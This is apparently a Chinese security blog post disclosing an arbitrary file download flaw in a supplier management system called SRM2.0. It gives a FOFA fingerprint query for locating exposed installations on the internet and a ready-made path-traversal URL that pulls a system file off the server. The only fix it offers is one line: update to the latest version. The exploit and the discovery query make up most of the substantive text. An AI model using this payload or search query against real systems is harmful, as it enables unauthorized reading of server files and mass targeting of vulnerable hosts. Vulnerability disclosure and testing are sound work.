某云彩SRM2.0任意文件下载漏洞

扣脚大汉在网络2024-09-06 16:01

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统download在接口处存在任意文件下载漏洞

漏洞复现

payload

复制代码 
http://ip/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=C:\Windows\System32\drivers\etc\hosts


修复建议

更新到最新版本

相关推荐
阿昭L2 天前
Windows堆dword shoot
windows·安全·漏洞·堆溢出
南山丶无梅落4 天前
文件上传漏洞2
漏洞·文件上传·网安·条件竞争·二次渲染·0x00截断·图片马
菩提小狗10 天前
每日安全情报报告 · 2026-06-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗11 天前
每日安全情报报告 · 2026-06-03
网络安全·漏洞·cve·安全情报·每日安全
南山丶无梅落11 天前
XXE漏洞
xml·漏洞·xxe·网安
菩提小狗12 天前
每日安全情报报告 · 2026-06-02
网络安全·漏洞·cve·安全情报·每日安全
网络研究院13 天前
即将过期的安全启动证书将如何影响 Windows 设备
安全·微软·系统·漏洞·硬件
网络研究院13 天前
管理瘫痪、人员短缺:深度解析 NIST NVD 为什么审不动漏洞了?
网络·安全·漏洞·管理·危机
菩提小狗15 天前
每日安全情报报告 · 2026-05-30
网络安全·漏洞·cve·安全情报·每日安全
草明17 天前
检查 node.js 项目中的漏洞
node.js·漏洞·audit
热门推荐
01HTTP 与 HTTPS 的区别:从原理到实战详解022026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?032026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?04【AI】2026 年具身智能模型和世界模型总结05GitHub 镜像站点06《置身钉内》原文-可播放阅读07AI科技热点日报 | 2026年6月1日08Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析092026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf10AI一周事件 · 2026-06-03 至 2026-06-09